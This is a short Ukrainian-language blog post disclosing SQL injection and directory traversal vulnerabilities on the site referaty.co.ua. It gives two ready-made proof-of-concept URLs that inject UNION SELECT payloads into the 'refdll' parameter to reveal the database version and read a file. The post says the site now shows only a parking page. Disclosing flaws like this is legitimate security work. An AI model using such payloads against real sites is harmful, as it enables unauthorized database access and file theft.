Уразливості на referaty.co.ua

15:10 22.02.2011

07.08.2010

У лютому, 10.02.2010, я знайшов SQL Injection та Directory Traversal уразливості на проекті http://referaty.co.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

22.02.2011

SQL Injection:

http://referaty.co.ua/files.php?refdll=-1+union+select+version()%23

Directory Traversal (через SQL Injection):

http://referaty.co.ua/files.php?refdll=-1+union+select+’../index.php’%23

Зараз сайт не працює (замість нього виводиться лише сторінка “парковки” домена).


Leave a Reply

You must be logged in to post a comment.